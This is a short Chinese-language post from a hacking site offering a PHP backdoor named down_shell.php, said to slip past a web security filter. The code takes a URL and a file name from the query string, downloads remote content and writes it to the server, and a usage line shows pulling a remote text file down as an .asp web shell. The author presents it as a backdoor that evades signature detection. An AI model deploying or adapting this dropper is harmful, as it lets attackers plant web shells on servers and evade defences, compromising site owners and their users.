突破一流拦截的php代码

down_shell.php -可过一流信息拦截

<?php
$str=file_get_contents($_GET[‘url’]);
echo file_put_contents($_GET[‘file’],$str);
?>
use: ?url=http://www.sswowo.com/1.txt&file=3.asp

代码很简单。 为什么都要用EVAL execute 来做后门呢,貌似这样做 也能起到后门的作用。而且不易被特征。

本文原文黑白安全网转自独自等待由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.